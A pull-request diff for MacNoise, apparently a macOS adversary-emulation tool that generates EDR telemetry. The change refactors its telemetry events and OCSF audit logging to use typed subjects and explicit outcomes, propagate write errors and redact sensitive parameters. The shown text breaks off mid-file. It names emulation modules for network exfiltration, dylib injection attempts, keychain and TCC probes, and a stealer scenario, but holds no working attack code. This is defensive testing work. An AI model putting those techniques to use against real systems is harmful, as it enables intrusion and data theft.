### PR TITLE
refactor: add typed telemetry events

### DIFF
--- a/AI-GUIDANCE.md
+++ b/AI-GUIDANCE.md
@@ -80,7 +80,7 @@ MacNoise is structured in five distinct layers. When reasoning about where a cha
 | File | Purpose |
 |------|---------|
 | `internal/output/emitter.go` | `Emitter` — wraps one or more `io.Writer` targets; `Format` type (`human` / `jsonl`); `NewEmitter`, `Emit`, `EmitFunc` |
-| `internal/output/event.go` | `NewEvent` — constructs a `TelemetryEvent` pre-populated with module metadata and `ProcessContext`; `WithDetails`, `WithError`, `WithOutcome`, `DetailStr`, `DetailInt` helpers; `SchemaVersion = "1.1"`; `CurrentProcessContext` |
+| `internal/output/event.go` | `NewEvent` constructs a `TelemetryEvent` with an explicit outcome and typed subject; `NormalizeEvent` applies authoritative identity and UTC time; `WithDetails`, `WithError`, `WithOutcome`, `DetailStr`, `DetailInt` helpers; `SchemaVersion = "2.0"`; `CurrentProcessContext` |
 
 ### Runner
 
@@ -175,28 +175,29 @@ Modules **never** write to stdout directly. All output flows through the `emit` 
 
 ```go
 // Construct
-ev := output.NewEvent(info, "event_type", false, "initial message")
+ev := output.NewEvent(info, "event_type", module.OutcomeExecuted, module.File(path), "initial message")
 
-// Decorate — success path
-ev.Success = true
+// Decorate the event.
 ev.Message = "final message"
 ev = output.WithDetails(ev, map[string]any{"key": "value"})
 
-// Decorate — macnoise itself failed
+// MacNoise itself failed.
 ev = output.WithError(ev, err)
 
-// Decorate — the action ran but the environment refused or did not answer it
+// The action ran but the environment refused or did not answer it.
 ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 
-// Emit
-emit(ev)
+// Propagate output and audit failures.
+if err := emit(ev); err != nil {
+    return err
+}
 ```
 
-`output.NewEvent` populates `SchemaVersion`, `Module`, `Category`, `EventType`, `MITRE`, and `ProcessContext` automatically. Modules only set `Success`, `Message`, `Details`, `Error`, and where it matters `Outcome`.
+`output.NewEvent` requires an explicit `Outcome` and exactly one typed `Subject`. Use `module.File`, `module.Process`, `module.Network`, `module.Service`, or `module.Resource`. The runner normalizes schema version, module identity, MITRE data, process context, and one UTC timestamp before telemetry and audit writers receive the event.
 
-**Picking between `WithError` and `WithOutcome`.** `Success` answers "did macnoise work"; `Outcome` answers "what happened to the action". A refused TCC probe, a connection to a closed port, and a missing target are all telemetry this tool exists to produce, not faults, and `WithError` would file them alongside a broken module. Reach for `WithOutcome` with `OutcomeDenied` when the environment refused, `OutcomeIndeterminate` when nothing can be concluded, and keep `WithError` for macnoise itself failing.
+**Picking between `WithError` and `WithOutcome`.** A refused TCC probe, a connection to a closed port, and a missing target are all telemetry this tool exists to produce, not faults. Use `OutcomeDenied` when the environment refused, `OutcomeIndeterminate` when nothing can be concluded, and `WithError` only when MacNoise itself failed.
 
-Most events set no outcome at all. The field is resolved from `Success` at the output boundary the same way `Timestamp` is, so emitted records always carry one and the two fields can never disagree - see `TelemetryEvent.ResolvedOutcome`.
+Every event must set one of the four valid outcomes. Missing outcomes and subjects fail at the runner boundary before any writer receives the event.
 
 ---
 

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -63,22 +63,26 @@ _ "github.com/0xv1n/macnoise/modules/mynewcategory"
 ## Emit Events Correctly
 
 ```go
-// Good — use output.NewEvent and the emit callback
-ev := output.NewEvent(info, "event_type", success, "message")
+// Good: declare the outcome and typed subject, then propagate write failures.
+ev := output.NewEvent(info, "event_type", module.OutcomeExecuted, module.File(path), "message")
 ev = output.WithDetails(ev, map[string]any{"key": "value"})
-emit(ev)
+if err := emit(ev); err != nil {
+    return err
+}
 
-// Bad — never write to stdout/stderr directly from a module
+// Bad: never write to stdout/stderr directly from a module.
 fmt.Println("something happened")
 ```
 
+Every event requires exactly one typed subject. Use `module.File`, `module.Process`, `module.Network`, `module.Service`, or `module.Resource`. Mark secret-bearing parameter specs with `Sensitive: true` so managed audit output redacts their values.
+
 ## Audit Logging (OCSF)
 
-MacNoise writes a second output stream alongside telemetry events: structured audit records in [OCSF 1.7.0](https://schema.ocsf.io/) JSONL format via `internal/audit/`. These records capture what MacNoise itself did — which modules ran, prereq and cleanup outcomes, timing, and MITRE mappings — rather than the telemetry events that modules produce for EDR consumption.
+MacNoise writes a second output stream alongside telemetry events: structured audit records in [OCSF 1.7.0](https://schema.ocsf.io/) JSONL format via `internal/audit/`. These records capture what MacNoise itself did - which modules ran, prereq and cleanup outcomes, timing, and MITRE mappings - rather than the telemetry events that modules produce for EDR consumption.
 
 ### Modules don't need to do anything
 
-The runner automatically wraps the `emit` callback with `Logger.WrapEmitter()` when `--audit-log` is active. Every `TelemetryEvent` emitted by your module is intercepted, classified, and written to the audit file without any change to module code. Lifecycle records (prereq check, cleanup, dry-run outcome) are also written by the runner — no module-level calls to `audit.Logger` are needed or appropriate.
+The runner automatically wraps the `emit` callback with `Logger.WrapEmitter()` when `--audit-log` is active. Every `TelemetryEvent` emitted by your module is normalized, classified, and written to the audit file without any audit-specific module code. Lifecycle records (prereq check, cleanup, dry-run outcome) are also written by the runner - no module-level calls to `audit.Logger` are needed or appropriate.
 
 ### Adding a new event type to the classifier
 
@@ -119,8 +123,8 @@ Each record is an `audit.Record` (`internal/audit/record.go`). Key fields and th
 | Field | Source |
 |-------|--------|
 | `class_uid` / `activity_id` | `Classify(ev.Category, ev.EventType)` |
-| `time` | Epoch milliseconds at write time |
-| `status_id` | `1` (success) or `2` (failure) from `ev.Success` |
+| `time` | Epoch milliseconds from the normalized event timestamp |
+| `status_id` | OCSF status derived from `ev.Outcome` |
 | `metadata.correlation_uid` | Shared run ID across all records in one execution |
 | `actor` | PID, executable path, and username of the macnoise process |
 | `attacks[]` | MITRE entries from `ModuleInfo.MITRE` |
@@ -129,7 +133,9 @@ Each record is an `audit.Record` (`internal/audit/record.go`). Key fields and th
 ### Checklist for audit-aware contributions
 
 - [ ] If your module emits a new `eventType` not handled by the existing category switch in `classify.go`, add a case
-- [ ] Do **not** call `audit.Logger` methods directly from module code — the runner owns the logger lifecycle
+- [ ] Give every event exactly one typed subject and propagate every `emit` error
+- [ ] Mark secret-bearing parameters with `Sensitive: true`
+- [ ] Do **not** call `audit.Logger` methods directly from module code - the runner owns the logger lifecycle
 - [ ] If you add a new `Category`, add a `case` in `Classify()` and update the class mapping table above
 - [ ] If you extend `LifecycleData` or `Record`, update the corresponding serialisation in `logger.go`
 - [ ] Verify audit records are valid OCSF by checking that `class_uid`, `category_uid`, `activity_id`, and `type_uid` are consistent (`type_uid = class_uid * 100 + activity_id`)

--- a/README.md
+++ b/README.md
@@ -98,7 +98,7 @@ MacNoise writes two separate streams. Telemetry events - what your EDR/SIEM actu
 ./macnoise scenario configs/scenarios/amos_atomic_stealer.yaml --audit-log /tmp/audit.jsonl
 ```
 
-Every telemetry event carries an `outcome` alongside `success` (schema 1.1). `success` says whether MacNoise worked; `outcome` says what happened to the action it attempted:
+Every telemetry event carries one authoritative `outcome` and one typed `subject` (schema 2.0). The outcome says what happened to the action MacNoise attempted, while the subject identifies the file, process, network endpoint, service, or resource involved:
 
 | `outcome` | Meaning | Human marker |
 |---|---|---|
@@ -107,7 +107,7 @@ Every telemetry event carries an `outcome` alongside `success` (schema 1.1). `su
 | `indeterminate` | The action ran, but nothing can be concluded | `[?]` |
 | `error` | MacNoise itself failed to carry the action out | `[!]` |
 
-A denied TCC probe or a beacon to a dead C2 is the telemetry this tool exists to generate, so those stay `success: true` and are told apart by `outcome`. Only `error` sets `success: false`. In the audit log the same value appears at `unmapped.outcome`, since OCSF `status` records a refused action and a broken tool identically.
+A denied TCC probe or a beacon to a dead C2 is the telemetry this tool exists to generate, so it is distinct from `error`, which means MacNoise itself failed. The audit log records the same value at `unmapped.outcome`. Parameters declared sensitive are replaced with `[REDACTED]` in managed audit records and command-line identity.
 
 The audit log opens in append mode, so records from multiple runs pile up in one file for batch analysis. If you're adding a module and want to know how a new event type gets classified into OCSF, see [CONTRIBUTING.md](CONTRIBUTING.md#audit-logging-ocsf).
 

--- a/cmd/macnoise/params_test.go
+++ b/cmd/macnoise/params_test.go
@@ -48,7 +48,7 @@ func TestNegativePayloadSizeIsRejectedBeforeExecution(t *testing.T) {
 		t.Fatal("net_exfil is not registered")
 	}
 
-	err := runner.RunSingle(context.Background(), gen, module.Params{"payload_size": "-1"}, func(module.TelemetryEvent) {}, runner.Options{})
+	err := runner.RunSingle(context.Background(), gen, module.Params{"payload_size": "-1"}, func(module.TelemetryEvent) error { return nil }, runner.Options{})
 	if err == nil || !strings.Contains(err.Error(), `parameter "payload_size" must be at least 0`) {
 		t.Fatalf("RunSingle error = %v", err)
 	}

--- a/internal/audit/logger.go
+++ b/internal/audit/logger.go
@@ -2,7 +2,9 @@ package audit
 
 import (
 	"encoding/json"
+	"errors"
 	"fmt"
+	"io"
 	"os"
 	"os/user"
 	"path/filepath"
@@ -75,20 +77,29 @@ func (l *Logger) Close() error {
 
 // WrapEmitter returns an EventEmitter that forwards events to emit and also logs each one via LogEvent.
 func (l *Logger) WrapEmitter(emit module.EventEmitter, info module.ModuleInfo, params module.Params, count *int) module.EventEmitter {
-	return func(ev module.TelemetryEvent) {
-		emit(ev)
+	return func(ev module.TelemetryEvent) error {
+		emitErr := emit(ev)
 		*count++
-		l.LogEvent(ev, info, params)
+		auditErr := l.LogEvent(ev, info, params)
+		return errors.Join(emitErr, auditErr)
 	}
 }
 
 // LogEvent writes an OCSF audit record for a single telemetry event emitted by a module.
-func (l *Logger) LogEvent(ev module.TelemetryEvent, info module.ModuleInfo, params module.Params) {
+func (l *Logger) LogEvent(ev module.TelemetryEvent, info module.ModuleInfo, params module.Params) error {
+	if !ev.Outcome.Valid() {
+		return fmt.Errorf("audit: event %q has invalid outcome %q", ev.EventType, ev.Outcome)
+	}
+	if err := ev.Subject.Validate(); err != nil {
+		return fmt.Errorf("audit: event %q subject: %w", ev.EventType, err)
+	}
 	cl := Classify(ev.Category, ev.EventType)
-	now := epochMS(time.Now())
+	eventTime := ev.Timestamp
+	if eventTime.IsZero() {
+		eventTime = time.Now().UTC()
+	}
 
-	outcome := ev.ResolvedOutcome()
-	st := statusForOutcome(outcome)
+	st := statusForOutcome(ev.Outcome)
 
 	rec := Record{
 		ActivityID:   cl.ActivityID,
@@ -99,7 +110,7 @@ func (l *Logger) LogEvent(ev module.TelemetryEvent, info module.ModuleInfo, para
 		ClassName:    cl.ClassName,
 		SeverityID:   st.SeverityID,
 		Severity:     st.Severity,
-		Time:         now,
+		Time:         epochMS(eventTime),
 		TypeUID:      cl.ClassUID*100 + cl.ActivityID,
 		TypeName:     fmt.Sprintf("%s: %s", cl.ClassName, cl.ActivityName),
 		Message:      ev.Message,
@@ -114,22 +125,22 @@ func (l *Logger) LogEvent(ev module.TelemetryEvent, info module.ModuleInfo, para
 			ModuleCategory: string(info.Category),
 			Params:         map[string]any(params),
 			Privileges:     string(info.Privileges),
-			Outcome:        string(outcome),
+			Outcome:        string(ev.Outcome),
 		},
 	}
 
 	switch cl.ClassUID {
 	case 1001:
-		rec.File = extractFile(ev.EventType, ev.Details)
+		rec.File = extractFile(ev.EventType, ev.Subject)
 	case 1007:
-		rec.Process = extractProcess(ev.Details, l.actor.Process)
+		rec.Process = extractProcess(ev.Subject, l.actor.Process)
 	}
 
-	l.write(rec)
+	return l.write(rec)
 }
 
 // LogLifecycle writes an OCSF audit record for a module lifecycle event (prereq, run, dry-run, cleanup).
-func (l *Logger) LogLifecycle(recordType string, info module.ModuleInfo, params module.Params, data LifecycleData) {
+func (l *Logger) LogLifecycle(recordType string, info module.ModuleInfo, params module.Params, data LifecycleData) error {
 	now := epochMS(time.Now())
 
 	severityID, severity := lifecycleSeverity(data)
@@ -187,11 +198,11 @@ func (l *Logger) LogLifecycle(recordType string, info module.ModuleInfo, params 
 		Unmapped:     unmapped,
 	}
 
-	l.write(rec)
+	return l.write(rec)
 }
 
 // LogScenario writes an OCSF audit record summarising the outcome of a full scenario run.
-func (l *Logger) LogScenario(name, path string, data LifecycleData) {
+func (l *Logger) LogScenario(name, path string, data LifecycleData) error {
 	now := epochMS(time.Now())
 
 	severityID := 1
@@ -252,21 +263,28 @@ func (l *Logger) LogScenario(name, path string, data LifecycleData) {
 		},
 	}
 
-	l.write(rec)
+	return l.write(rec)
 }
 
-func (l *Logger) write(rec Record) {
+func (l *Logger) write(rec Record) error {
 	b, err := json.Marshal(rec)
 	if err != nil {
-		return
+		return fmt.Errorf("audit: marshal record: %w", err)
 	}
 	l.mu.Lock()
 	defer l.mu.Unlock()
 	if l.f == nil {
-		return
+		return fmt.Errorf("audit: logger is closed")
 	}
-	l.f.Write(b)            //nolint:errcheck
-	l.f.Write([]byte{'\n'}) //nolint:errcheck
+	b = append(b, '\n')
+	n, err := l.f.Write(b)
+	if err != nil {
+		return fmt.Errorf("audit: write record: %w", err)
+	}
+	if n != len(b) {
+		return fmt.Errorf("audit: write record: %w", io.ErrShortWrite)
+	}
+	return nil
 }
 
 func (l *Logger) metadata() OCSFMetadata {
@@ -292,12 +310,26 @@ func currentActor() *OCSFActor {
 	proc := &OCSFProcess{
 		PID:     os.Getpid(),
 		Name:    "MacNoise",
-		CmdLine: strings.Join(os.Args, " "),
+		CmdLine: redactedCommandLine(os.Args),
 	}
 	if u, err := user.Current(); err == nil {
 		proc.User = &OCSFUser{Name: u.Username}
 	}
 	return &OCSFActor{Process: proc}
+}
+
+func redactedCommandLine(args []string) string {
+	redacted := append([]string(nil), args...)
+	for i := 0; i < len(redacted); i++ {
+		switch {
+		case redacted[i] == "--param" && i+1 < len(redacted):
+			redacted[i+1] = module.RedactedValue
+			i++
+		case strings.HasPrefix(redacted[i], "--param="):
+			redacted[i] = "--param=" + module.RedactedValue
+		}
+	}
+	return strings.Join(redacted, " ")
 }
 
 // currentDevice identifies the local host. type_id is Unknown (0) rather
@@ -308,50 +340,49 @@ func currentDevice() *OCSFDevice {
 	return &OCSFDevice{TypeID: 0, Hostname: hostname}
 }
 
-// extractFile builds the file object a file_activity (1001) record requires
-// from whatever the emitting module put in ev.Details. Modules aren't
-// required to use a consistent key for this (most use "path"; file_archive
-// uses "output_path" for the archive it created), so this is deliberately
-// best-effort: if no known key is present, it still returns a non-nil File
-// (satisfying the required field) generic enough not to claim data that
-// isn't there.
-func extractFile(eventType string, details map[string]any) *OCSFFile {
-	path, _ := details["path"].(string)
-	if path == "" {
-		path, _ = details["output_path"].(string)
+// extractFile builds the file object required by OCSF file activity from the
+// event's typed subject.
+func extractFile(eventType string, subject module.Subject) *OCSFFile {
+	name := ""
+	path := ""
+	if subject.File != nil {
+		name = subject.File.Name
+		path = subject.File.Path
+	} else if subject.Resource != nil {
+		name = subject.Resource.Name
+		path = subject.Resource.Path
 	}
 	typeID := 1 // Regular File
 	if eventType == "dir_create" {
 		typeID = 2 // Folder
 	}
-	if path == "" {
-		return &OCSFFile{Name: eventType, TypeID: typeID}
+	if name == "" && path != "" {
+		name = filepath.Base(path)
 	}
-	return &OCSFFile{Name: filepath.Base(path), Path: path, TypeID: typeID}
+	if name == "" {
+		name = eventType
+	}
+	if path == "" {
+		return &OCSFFile{Name: name, TypeID: typeID}
+	}
+	return &OCSFFile{Name: name, Path: path, TypeID: typeID}
 }
 
-// extractProcess builds the process object a process_activity (1007) record
-// requires. A handful of modules record the actual target process's pid
-// and/or command in ev.Details (process_fork has both; process_spawn and
-// dylib_inject_attempt have a command/target with no pid, since those exec
-// synchronously rather than tracking a forked pid); everything else falls
-// back to macnoise's own process, since it performed the activity even when
-// it didn't hand off to a distinctly-tracked child.
-func extractProcess(details map[string]any, fallback *OCSFProcess) *OCSFProcess {
-	name, hasName := details["command"].(string)
-	if !hasName {
-		name, hasName = details["target"].(string)
-	}
-	pid, hasPID := details["pid"].(int)
-
-	if !hasName && !hasPID {
+// extractProcess builds the process object required by OCSF process activity
+// from the event's typed subject.
+func extractProcess(subject module.Subject, fallback *OCSFProcess) *OCSFProcess {
+	if subject.Process == nil {
 		return fallback
 	}
-	proc := &OCSFProcess{Name: name}
-	if hasPID {
-		proc.PID = pid
+	s := subject.Process
+	name := s.Name
+	if name == "" {
+		name = s.Executable
 	}
-	return proc
+	if name == "" {
+		name = s.Command
+	}
+	return &OCSFProcess{PID: s.PID, Name: name, CmdLine: s.Command}
 }
 
 func mitreToAttacks(mitre []module.MITRE) []OCSFAttack {

--- a/internal/audit/logger_test.go
+++ b/internal/audit/logger_test.go
@@ -69,16 +69,23 @@ func TestLogEvent_WritesValidOCSFRecord(t *testing.T) {
 		},
 	}
 	params := module.Params{"target": "127.0.0.1", "port": "8080"}
+	eventTime := time.Date(2026, time.September, 11, 12, 34, 56, 789000000, time.FixedZone("test", -7*60*60))
 
 	ev := module.TelemetryEvent{
+		Timestamp: eventTime,
 		Module:    "net_connect",
 		Category:  "network",
 		EventType: "tcp_connect",
-		Success:   true,
+		Outcome:   module.OutcomeExecuted,
+		Subject:   module.Network("127.0.0.1:8080", "", ""),
 		Message:   "TCP connection established",
 	}
-	l.LogEvent(ev, info, params)
-	l.Close()
+	if err := l.LogEvent(ev, info, params); err != nil {
+		t.Fatal(err)
+	}
+	if err := l.Close(); err != nil {
+		t.Fatal(err)
+	}
 
 	records := readRecords(t, path)
 	if len(records) != 1 {
@@ -103,8 +110,8 @@ func TestLogEvent_WritesValidOCSFRecord(t *testing.T) {
 	if rec.SeverityID != 1 {
 		t.Errorf("severity_id: expected 1, got %d", rec.SeverityID)
 	}
-	if rec.Time == 0 {
-		t.Error("time should be non-zero")
+	if rec.Time != epochMS(eventTime) {
+		t.Errorf("time = %d, want event time %d", rec.Time, epochMS(eventTime))
 	}
 	if rec.Metadata.Version != "1.7.0" {
 		t.Errorf("metadata.version: expected 1.7.0, got %q", rec.Metadata.Version)
@@ -149,7 +156,8 @@ func TestLogEvent_FailureEvent(t *testing.T) {
 	ev := module.TelemetryEvent{
 		Category:  "network",
 		EventType: "tcp_connect",
-		Success:   false,
+		Outcome:   module.OutcomeError,
+		Subject:   module.Network("127.0.0.1:1", "", ""),
 		Message:   "connection refused",
 	}
 
@@ -274,17 +282,22 @@ func TestWrapEmitter_DelegatesAndCounts(t *testing.T) {
 	params := module.Params{}
 
 	var received []module.TelemetryEvent
-	original := func(ev module.TelemetryEvent) {
+	original := func(ev module.TelemetryEvent) error {
 		received = append(received, ev)
+		return nil
 	}
 
 	var count int
 	wrapped := l.WrapEmitter(original, info, params, &count)
 
-	ev1 := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Success: true, Message: "ok1"}
-	ev2 := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Success: true, Message: "ok2"}
-	wrapped(ev1)
-	wrapped(ev2)
+	ev1 := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Outcome: module.OutcomeExecuted, Subject: module.Network("one:1", "", ""), Message: "ok1"}
+	ev2 := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Outcome: module.OutcomeExecuted, Subject: module.Network("two:2", "", ""), Message: "ok2"}
+	if err := wrapped(ev1); err != nil {
+		t.Fatal(err)
+	}
+	if err := wrapped(ev2); err != nil {
+		t.Fatal(err)
+	}
 	l.Close()
 
 	// Original emitter received both events.
@@ -336,7 +349,7 @@ func TestCorrelationUID_SameAcrossRecords(t *testing.T) {
 	info := module.ModuleInfo{Name: "mod_a", Category: "network", Privileges: module.PrivilegeNone}
 	params := module.Params{}
 
-	ev := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Success: true}
+	ev := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Outcome: module.OutcomeExecuted, Subject: module.Network("example:1", "", "")}
 	l.LogEvent(ev, info, params)
 	l.LogEvent(ev, info, params)
 	l.Close()
@@ -363,7 +376,7 @@ func TestNewLogger_ExternalRunID(t *testing.T) {
 	defer l.Close()
 
 	info := module.ModuleInfo{Name: "test", Category: "network", Privileges: module.PrivilegeNone}
-	ev := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Success: true}
+	ev := module.TelemetryEvent{Category: "network", EventType: "tcp_connect", Outcome: module.OutcomeExecuted, Subject: module.Network("example:1", "", "")}
 	l.LogEvent(ev, info, module.Params{})
 	l.Close()
 
@@ -382,6 +395,31 @@ func TestGenerateRunID_Format(t *testing.T) {
 		if (c < '0' || c > '9') && (c < 'a' || c > 'f') {
 			t.Fatalf("RunID contains non-hex char %q: %s", c, id)
 		}
+	}
+}
+
+func TestRedactedCommandLine(t *testing.T) {
+	const secret = "correct-horse-battery-staple"
+	got := redactedCommandLine([]string{
+		"macnoise", "run", "tcc_keychain",
+		"--param", "password=" + secret,
+		"--param=payload=" + secret,
+	})
+	if strings.Contains(got, secret) {
+		t.Fatalf("redacted command line contains sensitive value: %q", got)
+	}
+	if count := strings.Count(got, module.RedactedValue); count != 2 {
+		t.Fatalf("redaction markers = %d, want 2 in %q", count, got)
+	}
+}
+
+func TestLogScenarioReturnsWriteFailure(t *testing.T) {
+	l, _ := newTestLogger(t)
+	if err := l.Close(); err != nil {
+		t.Fatal(err)
+	}
+	if err := l.LogScenario("closed", "scenario.yaml", LifecycleData{}); err == nil {
+		t.Fatal("LogScenario succeeded after logger was closed")
 	}
 }
 

--- a/internal/audit/outcome_test.go
+++ b/internal/audit/outcome_test.go
@@ -67,27 +67,21 @@ func TestLogEventRecordsOutcome(t *testing.T) {
 	}{
 		{
 			name:        "denial is not reported as a successful activity",
-			ev:          module.TelemetryEvent{Category: "tcc", EventType: "tcc_fda_probe", Success: true, Outcome: module.OutcomeDenied},
+			ev:          module.TelemetryEvent{Category: "tcc", EventType: "tcc_fda_probe", Outcome: module.OutcomeDenied, Subject: module.Resource("tcc", "fda", "/tmp/TCC.db")},
 			wantOutcome: "denied",
 			wantStatus:  "Failure",
 		},
 		{
 			name:        "probe error is not reported as a success",
-			ev:          module.TelemetryEvent{Category: "tcc", EventType: "tcc_fda_probe", Success: true, Outcome: module.OutcomeError},
+			ev:          module.TelemetryEvent{Category: "tcc", EventType: "tcc_fda_probe", Outcome: module.OutcomeError, Subject: module.Resource("tcc", "fda", "/tmp/TCC.db")},
 			wantOutcome: "error",
 			wantStatus:  "Failure",
 		},
 		{
 			name:        "absent target is unknown, not failed",
-			ev:          module.TelemetryEvent{Category: "tcc", EventType: "tcc_fda_probe", Success: true, Outcome: module.OutcomeIndeterminate},
+			ev:          module.TelemetryEvent{Category: "tcc", EventType: "tcc_fda_probe", Outcome: module.OutcomeIndeterminate, Subject: module.Resource("tcc", "fda", "/tmp/TCC.db")},
 			wantOutcome: "indeterminate",
 			wantStatus:  "Unknown",
-		},
-		{
-			name:        "an event with no outcome still records one",
-			ev:          module.TelemetryEvent{Category: "tcc", EventType: "tcc_fda_probe", Success: true},
-			wantOutcome: "executed",
-			wantStatus:  "Success",
 		},
 	}
 
@@ -116,7 +110,9 @@ func recordFor(t *testing.T, ev module.TelemetryEvent) Record {
 	t.Helper()
 
 	l, path := newTestLogger(t)
-	l.LogEvent(ev, module.ModuleInfo{Name: "tcc_fda", Category: module.CategoryTCC}, nil)
+	if err := l.LogEvent(ev, module.ModuleInfo{Name: "tcc_fda", Category: module.CategoryTCC}, nil); err != nil {
+		t.Fatalf("log event: %v", err)
+	}
 	if err := l.Close(); err != nil {
 		t.Fatalf("close logger: %v", err)
 	}

--- a/internal/audit/record_test.go
+++ b/internal/audit/record_test.go
@@ -10,7 +10,7 @@ func TestExtractFile(t *testing.T) {
 	tests := []struct {
 		name      string
 		eventType string
-		details   map[string]any
+		subject   module.Subject
 		wantName  string
 		wantPath  string
 		wantType  int
@@ -18,7 +18,7 @@ func TestExtractFile(t *testing.T) {
 		{
 			name:      "path key",
 			eventType: "file_create",
-			details:   map[string]any{"path": "/tmp/macnoise_test/file1.txt"},
+			subject:   module.File("/tmp/macnoise_test/file1.txt"),
 			wantName:  "file1.txt",
 			wantPath:  "/tmp/macnoise_test/file1.txt",
 			wantType:  1,
@@ -26,7 +26,7 @@ func TestExtractFile(t *testing.T) {
 		{
 			name:      "output_path key (file_archive)",
 			eventType: "archive_create",
-			details:   map[string]any{"output_path": "/tmp/macnoise_archive.zip", "source_dir": "/tmp/src"},
+			subject:   module.File("/tmp/macnoise_archive.zip"),
 			wantName:  "macnoise_archive.zip",
 			wantPath:  "/tmp/macnoise_archive.zip",
 			wantType:  1,
@@ -34,7 +34,7 @@ func TestExtractFile(t *testing.T) {
 		{
 			name:      "dir_create gets Folder type_id",
 			eventType: "dir_create",
-			details:   map[string]any{"path": "/tmp/macnoise_test"},
+			subject:   module.File("/tmp/macnoise_test"),
 			wantName:  "macnoise_test",
 			wantPath:  "/tmp/macnoise_test",
 			wantType:  2,
@@ -42,8 +42,8 @@ func TestExtractFile(t *testing.T) {
 		{
 			name:      "no known path key still returns a non-nil File",
 			eventType: "plist_modify",
-			details:   map[string]any{"domain": "com.macnoise.test", "key": "MacnoiseTest"},
-			wantName:  "plist_modify",
+			subject:   module.Resource("preference", "com.macnoise.test:MacnoiseTest", ""),
+			wantName:  "com.macnoise.test:MacnoiseTest",
 			wantPath:  "",
 			wantType:  1,
 		},
@@ -51,7 +51,7 @@ func TestExtractFile(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			f := extractFile(tt.eventType, tt.details)
+			f := extractFile(tt.eventType, tt.subject)
 			if f == nil {
 				t.Fatal("extractFile returned nil, OCSF requires file to be present for file_activity records")
 			}
@@ -73,31 +73,31 @@ func TestExtractProcess(t *testing.T) {
 
 	tests := []struct {
 		name     string
-		details  map[string]any
+		subject  module.Subject
 		wantPID  int
 		wantName string
 	}{
 		{
 			name:     "pid and command (process_fork)",
-			details:  map[string]any{"pid": 4242, "command": "sleep 30"},
+			subject:  module.Process("sleep", "/bin/sleep", "sleep 30", 4242),
 			wantPID:  4242,
-			wantName: "sleep 30",
+			wantName: "sleep",
 		},
 		{
 			name:     "command only, no pid (process_spawn)",
-			details:  map[string]any{"command": "echo hi"},
+			subject:  module.Process("sh", "/bin/sh", "echo hi", 0),
 			wantPID:  0,
-			wantName: "echo hi",
+			wantName: "sh",
 		},
 		{
 			name:     "target only (dylib_inject_attempt)",
-			details:  map[string]any{"target": "/usr/bin/true", "dyld_insert_libs": "/tmp/x.dylib"},
+			subject:  module.Process("true", "/usr/bin/true", "/usr/bin/true", 0),
 			wantPID:  0,
-			wantName: "/usr/bin/true",
+			wantName: "true",
 		},
 		{
 			name:     "neither key present falls back to macnoise's own process",
-			details:  map[string]any{"language": "AppleScript", "script": "display notification"},
+			subject:  module.Resource("script", "AppleScript", ""),
 			wantPID:  fallback.PID,
 			wantName: fallback.Name,
 		},
@@ -105,7 +105,7 @@ func TestExtractProcess(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			p := extractProcess(tt.details, fallback)
+			p := extractProcess(tt.subject, fallback)
 			if p == nil {
 				t.Fatal("extractProcess returned nil, OCSF requires process to be present for process_activity records")
 			}
@@ -127,13 +127,13 @@ func TestLogEvent_RequiredFieldsByClass(t *testing.T) {
 		name        string
 		category    string
 		eventType   string
-		details     map[string]any
+		subject     module.Subject
 		wantFile    bool
 		wantProcess bool
 	}{
-		{"file_activity gets file, no process", "file", "file_create", map[string]any{"path": "/tmp/x.txt"}, true, false},
-		{"process_activity gets process, no file", "process", "process_spawn", map[string]any{"command": "id"}, false, true},
-		{"network_activity gets neither", "network", "tcp_connect", nil, false, false},
+		{"file_activity gets file, no process", "file", "file_create", module.File("/tmp/x.txt"), true, false},
+		{"process_activity gets process, no file", "process", "process_spawn", module.Process("sh", "/bin/sh", "id", 0), false, true},
+		{"network_activity gets neither", "network", "tcp_connect", module.Network("127.0.0.1:1", "", ""), false, false},
 	}
 
 	for _, tt := range tests {
@@ -142,7 +142,7 @@ func TestLogEvent_RequiredFieldsByClass(t *testing.T) {
 			defer l.Close()
 
 			info := module.ModuleInfo{Name: "test_mod", Category: module.Category(tt.category), Privileges: module.PrivilegeNone}
-			ev := module.TelemetryEvent{Category: tt.category, EventType: tt.eventType, Success: true, Details: tt.details}
+			ev := module.TelemetryEvent{Category: tt.category, EventType: tt.eventType, Outcome: module.OutcomeExecuted, Subject: tt.subject}
 			l.LogEvent(ev, info, module.Params{})
 			l.Close()
 

--- a/internal/output/emitter.go
+++ b/internal/output/emitter.go
@@ -5,10 +5,10 @@ package output
 
 import (
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
 	"sync"
-	"time"
 
 	"github.com/0xv1n/macnoise/pkg/module"
 )
@@ -38,32 +38,41 @@ func NewEmitter(format Format, writers ...io.Writer) *Emitter {
 }
 
 // Emit serialises ev and writes it to every configured writer.
-func (e *Emitter) Emit(ev module.TelemetryEvent) {
-	if ev.Timestamp.IsZero() {
-		ev.Timestamp = time.Now().UTC()
+func (e *Emitter) Emit(ev module.TelemetryEvent) error {
+	var err error
+	ev, err = prepareEvent(ev)
+	if err != nil {
+		return err
 	}
-	ev.Outcome = ev.ResolvedOutcome()
 
 	e.mu.Lock()
 	defer e.mu.Unlock()
 
-	for _, w := range e.writers {
+	var errs []error
+	for i, w := range e.writers {
+		var writeErr error
 		switch e.format {
 		case FormatJSONL:
-			e.writeJSONL(w, ev)
+			writeErr = e.writeJSONL(w, ev)
 		default:
-			e.writeHuman(w, ev)
+			writeErr = e.writeHuman(w, ev)
+		}
+		if writeErr != nil {
+			errs = append(errs, fmt.Errorf("output writer %d: %w", i+1, writeErr))
 		}
 	}
+	return errors.Join(errs...)
 }
 
-func (e *Emitter) writeJSONL(w io.Writer, ev module.TelemetryEvent) {
+func (e *Emitter) writeJSONL(w io.Writer, ev module.TelemetryEvent) error {
 	b, err := json.Marshal(ev)
 	if err != nil {
